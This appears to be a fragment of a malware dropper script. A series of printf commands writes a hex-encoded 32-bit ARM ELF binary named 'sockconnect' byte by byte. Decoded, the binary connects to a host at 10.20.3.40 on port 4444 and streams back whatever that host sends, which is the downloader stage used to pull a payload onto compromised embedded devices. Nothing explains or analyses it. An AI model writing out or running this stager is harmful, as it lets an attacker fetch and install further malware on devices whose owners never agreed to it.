printf "%b" "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> sockconnect
printf "%b" "\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00" >> sockconnect
printf "%b" "\xb8\x00\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00" >> sockconnect
printf "%b" "\x03\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> sockconnect
printf "%b" "\x00\x00\x01\x00\xa4\x00\x00\x00\xa4\x00\x00\x00\x05\x00\x00\x00" >> sockconnect
printf "%b" "\x00\x00\x01\x00\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21" >> sockconnect
printf "%b" "\x52\x40\xc8\x27\x51\x37\x00\xdf\x04\x1c\x0c\xa1\x10\x22\x02\x37" >> sockconnect
printf "%b" "\x00\xdf\x01\x23\x9b\x02\x69\x46\xc9\x1a\x8d\x46\x00\x20\x1a\x1c" >> sockconnect
printf "%b" "\x03\x27\x00\xdf\x02\x1c\x20\x1c\x04\x27\x00\xdf\x00\x2a\xf5\xdc" >> sockconnect
printf "%b" "\x20\x1c\x06\x27\x00\xdf\x40\x40\x01\x27\x00\xdf\x02\x00\x11\x5c" >> sockconnect
printf "%b" "\x0a\x14\x03\x28\x00" >> sockconnect
